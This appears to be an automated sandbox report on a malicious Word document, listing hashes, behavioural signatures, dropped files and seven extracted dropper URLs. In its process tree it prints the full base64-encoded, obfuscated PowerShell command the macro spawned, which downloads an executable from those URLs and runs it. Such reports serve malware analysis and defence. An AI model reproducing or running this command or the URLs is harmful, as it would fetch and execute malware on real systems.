Analysis

  • max time kernel
    100s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/05/2024, 16:34

General

  • Target

    25bcb78ec0c2780e1c06ada42968d9d7_JaffaCakes118.doc

  • Size

    170KB

  • MD5

    25bcb78ec0c2780e1c06ada42968d9d7

  • SHA1

    48dfb63d1a6dd107694daa9c2a3d7aba429406bf

  • SHA256

    db18e8e273721a438d28a0af0729005b92df1544c25418e5aec74b0395c1a5c1

  • SHA512

    36dbea58184f99f3ea196117fd1c28e011fd8fb62c0b7d5d765defc09d782a1f3e7b64ffbb377dd80efd08cb9bb96a960a15fc4918d1eac08cd5ba7f3e0afd1f

  • SSDEEP

    1536:x4d4qDv4d4qDPrdi1Ir77zOH98Wj2gpngR+a9AV/IH+mD7UZPfMclw0:VrfrzOH98ipghH+O7UZ3Mclw0

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zhaniyasoft.ir/wp-content/file/ANEbg/

exe.dropper

http://visualblends.com/images/attach/nGKW/

exe.dropper

http://dagostim.com.br/rss/public/4xxkqIh/

exe.dropper

http://earthinnovation.org/gcfimpact/public/sXzPpHP/

exe.dropper

http://pcdesigns4you.com/wp-admin/public/eo8UUYeCUKx/

exe.dropper

http://www.weblabor.com.br/avisos/24206240720/

exe.dropper

http://pedroguinle.com/Tijuca-project/WAQgDjW/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25bcb78ec0c2780e1c06ada42968d9d7_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3096
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JABLAHQAYwB6AHYAdwAyAD0AKAAoACcASABkAHYANgAnACsAJwB1ACcAKQArACcAZQAwACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBwAHIAbwBGAGkAbABlAFwAaQBwAEEAVQBEAGUAbwBcAEsAXwBKADkAYQB0AHIAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAHUAYABSAEkAdAB5AGAAcAByAE8AVABvAGAAQwBgAG8ATAAiACAAPQAgACgAJwB0ACcAKwAoACcAbABzACcAKwAnADEAMgAsACAAdAAnACkAKwAoACcAbABzACcAKwAnADEAJwApACsAKAAnADEALAAnACsAJwAgAHQAJwApACsAJwBsAHMAJwApADsAJABYAG0AbgBoAG4AbABxACAAPQAgACgAJwBTAGkAJwArACgAJwB5ACcAKwAnAGQAdwBkACcAKQApADsAJABYAHcAcwA1ADUAbABqAD0AKAAnAEkAJwArACgAJwA3ADQANAA2ACcAKwAnAGoAJwApACsAJwAyACcAKQA7ACQAQQBhAG4AaQA0AHYAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAFgAMgAnACsAJwBxAEkAJwApACsAKAAnAHAAJwArACcAYQB1AGQAZQBvACcAKQArACcAWAAyACcAKwAnAHEAJwArACgAJwBLAF8AagA5AGEAdAByACcAKwAnAFgAJwArACcAMgBxACcAKQApAC4AIgByAGAARQBwAEwAQQBgAEMARQAiACgAKABbAEMAaABhAFIAXQA4ADgAKwBbAEMAaABhAFIAXQA1ADAAKwBbAEMAaABhAFIAXQAxADEAMwApACwAJwBcACcAKQApACsAJABYAG0AbgBoAG4AbABxACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAUwB6AG0AagBfAHQAdAA9ACgAJwBIACcAKwAoACcAYQAnACsAJwBkAGkANAA3AG8AJwApACkAOwAkAEUAYwBvAGMAMQA5ADYAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBlAGIAYwBMAEkAZQBOAHQAOwAkAEgAcgBwAHIAZwA5AGwAPQAoACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACkAKwAnAC8AegAnACsAJwBoACcAKwAoACcAYQAnACsAJwBuAGkAJwApACsAJwB5ACcAKwAnAGEAJwArACgAJwBzACcAKwAnAG8AZgAnACkAKwAoACcAdAAuAGkAJwArACcAcgAnACsAJwAvACcAKwAnAHcAcAAtAGMAbwBuAHQAJwApACsAKAAnAGUAbgB0ACcAKwAnAC8AJwApACsAKAAnAGYAJwArACcAaQBsAGUALwBBAE4ARQAnACsAJwBiAGcALwAqACcAKQArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwADoAJwArACcALwAvAHYAJwApACsAKAAnAGkAcwB1ACcAKwAnAGEAJwApACsAKAAnAGwAYgAnACsAJwBsAGUAJwApACsAKAAnAG4AJwArACcAZABzAC4AJwApACsAJwBjAG8AJwArACgAJwBtAC8AaQBtACcAKwAnAGEAJwArACcAZwAnACkAKwAoACcAZQAnACsAJwBzAC8AYQAnACkAKwAoACcAdAAnACsAJwB0AGEAYwAnACkAKwAoACcAaAAnACsAJwAvAG4AJwArACcARwBLAFcALwAqAGgAJwArACcAdAB0AHAAOgAnACsAJwAvACcAKQArACcALwBkACcAKwAnAGEAZwAnACsAKAAnAG8AJwArACcAcwB0AGkAJwApACsAKAAnAG0AJwArACcALgBjACcAKQArACgAJwBvAG0ALgBiAHIAJwArACcALwAnACsAJwByAHMAJwApACsAKAAnAHMALwBwAHUAYgBsACcAKwAnAGkAJwArACcAYwAnACsAJwAvADQAeAB4ACcAKQArACcAawAnACsAKAAnAHEAJwArACcASQBoAC8AKgBoACcAKQArACgAJwB0ACcAKwAnAHQAcAA6AC8ALwBlACcAKQArACcAYQAnACsAKAAnAHIAdABoACcAKwAnAGkAbgBuACcAKQArACgAJwBvAHYAYQB0ACcAKwAnAGkAJwArACcAbwAnACkAKwAoACcAbgAuAG8AJwArACcAcgAnACkAKwAoACcAZwAvACcAKwAnAGcAYwBmACcAKwAnAGkAbQBwAGEAJwApACsAKAAnAGMAJwArACcAdAAvAHAAdQAnACkAKwAoACcAYgAnACsAJwBsAGkAJwApACsAKAAnAGMALwBzACcAKwAnAFgAJwArACcAegBQAHAASABQAC8AKgBoACcAKwAnAHQAJwArACcAdAAnACkAKwAnAHAAJwArACcAOgAvACcAKwAoACcALwBwACcAKwAnAGMAZABlACcAKQArACgAJwBzACcAKwAnAGkAZwBuAHMANAB5ACcAKwAnAG8AdQAnACkAKwAoACcALgBjACcAKwAnAG8AbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwBwAHUAJwArACcAYgBsAGkAYwAvAGUAbwA4AFUAJwApACsAKAAnAFUAJwArACcAWQBlACcAKQArACgAJwBDAFUASwB4AC8AJwArACcAKgAnACkAKwAoACcAaAB0ACcAKwAnAHQAcAA6AC8AJwApACsAKAAnAC8AdwB3ACcAKwAnAHcAJwArACcALgB3AGUAYgAnACkAKwAnAGwAYQAnACsAKAAnAGIAbwAnACsAJwByAC4AYwBvACcAKwAnAG0ALgBiAHIALwBhAHYAJwArACcAaQBzAG8AcwAvACcAKQArACgAJwAyADQAJwArACcAMgAnACkAKwAoACcAMAA2ADIAJwArACcANAAwADcAMgAwAC8AJwArACcAKgAnACkAKwAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAJwArACcAOgAvAC8AcAAnACkAKwAoACcAZQAnACsAJwBkAHIAbwBnACcAKQArACgAJwB1ACcAKwAnAGkAbgAnACkAKwAoACcAbAAnACsAJwBlAC4AYwBvAG0ALwAnACsAJwBUAGkAagB1AGMAYQAtAHAAcgBvACcAKwAnAGoAZQAnACkAKwAnAGMAJwArACgAJwB0AC8AVwBBACcAKwAnAFEAJwApACsAKAAnAGcAJwArACcARABqACcAKQArACcAVwAvACcAKQAuACIAUwBQAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJADIAZwBkAGMANAA4AD0AKAAnAEIANAAnACsAKAAnAGkAJwArACcAXwAyAGwAJwApACsAJwBkACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AZwBxAF8AcwB4AHkAIABpAG4AIAAkAEgAcgBwAHIAZwA5AGwAKQB7AHQAcgB5AHsAJABFAGMAbwBjADEAOQA2AC4AIgBkAGAAbwB3AG4ATABgAG8AYQBEAEYASQBsAEUAIgAoACQATQBnAHEAXwBzAHgAeQAsACAAJABBAGEAbgBpADQAdgBnACkAOwAkAFoAdQAwAG8AagA2ADMAPQAoACgAJwBDACcAKwAnAGgAcwAnACkAKwAnADQAJwArACgAJwBoAGIAJwArACcAcwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABBAGEAbgBpADQAdgBnACkALgAiAEwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgA5ADQAMwA1ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0ASQB0ACcAKwAnAGUAbQAnACkAKAAkAEEAYQBuAGkANAB2AGcAKQA7ACQAVgBzAGUAZAB5AHYAOQA9ACgAJwBZAGgAJwArACgAJwBoAGwAJwArACcAdQB1AF8AJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAagBpADkAXwB6AHIAPQAoACcAVgBhACcAKwAoACcANgBrAGUAZwAnACsAJwBhACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAHMAOAA1AF8ANQBsAD0AKAAoACcAQQB3ACcAKwAnAGwAeAB2AGMAJwApACsAJwB0ACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4580

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\TCD87CB.tmp\sist02.xsl

          Filesize

          245KB

          MD5

          f883b260a8d67082ea895c14bf56dd56

          SHA1

          7954565c1f243d46ad3b1e2f1baf3281451fc14b

          SHA256

          ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

          SHA512

          d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dylxr2zr.wuo.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\ipAUDeo\K_J9atr\Siydwd.exe

          Filesize

          105KB

          MD5

          a505e990bf121e37d8c33a3929727885

          SHA1

          3b436c512eaac02ea878a2d70f430a2ad40babb9

          SHA256

          9129dde73af0c18ac5320fd7c31ac10799e005869ca949c7ac1047e7187ea9d0

          SHA512

          b5d426571ded0bad1e6ad4cf2eef3e3ad1e4a12b08eb3cb4cfaaf050c1e5f0f4dc1392630086872a6538382fbace1a49b8fed2c1b7d68b0283d3bd64452c35d7

        • memory/3096-7-0x00007FF922C60000-0x00007FF922C70000-memory.dmp

          Filesize

          64KB

        • memory/3096-571-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-5-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-6-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-2-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-9-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-10-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-11-0x00007FF922C60000-0x00007FF922C70000-memory.dmp

          Filesize

          64KB

        • memory/3096-8-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-12-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-13-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-24-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-25-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-595-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-594-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-0-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-4-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-591-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-3-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-1-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-572-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/3096-592-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/3096-593-0x00007FF925510000-0x00007FF925520000-memory.dmp

          Filesize

          64KB

        • memory/4580-91-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB

        • memory/4580-63-0x0000022366B80000-0x0000022366BA2000-memory.dmp

          Filesize

          136KB

        • memory/4580-62-0x00007FF962D70000-0x00007FF963039000-memory.dmp

          Filesize

          2.8MB